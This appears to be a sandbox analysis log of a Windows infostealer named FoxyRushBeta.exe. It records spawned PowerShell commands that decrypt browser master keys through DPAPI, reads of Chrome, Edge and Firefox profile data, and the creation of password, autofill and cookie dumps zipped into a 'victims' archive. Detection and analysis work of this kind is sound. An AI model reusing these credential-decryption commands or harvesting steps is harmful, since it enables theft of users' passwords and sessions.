Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --gpu-preferences=uaaaaaaaaadoaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaabcaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --gpu-preferences=uaaaaaaaaadgaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --gpu-preferences=uaaaaaaaaadoaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaabcaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox\firefoxcookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox\firefoxcookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox\firefoxcookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox\firefoxcookies.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\579569victims1.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
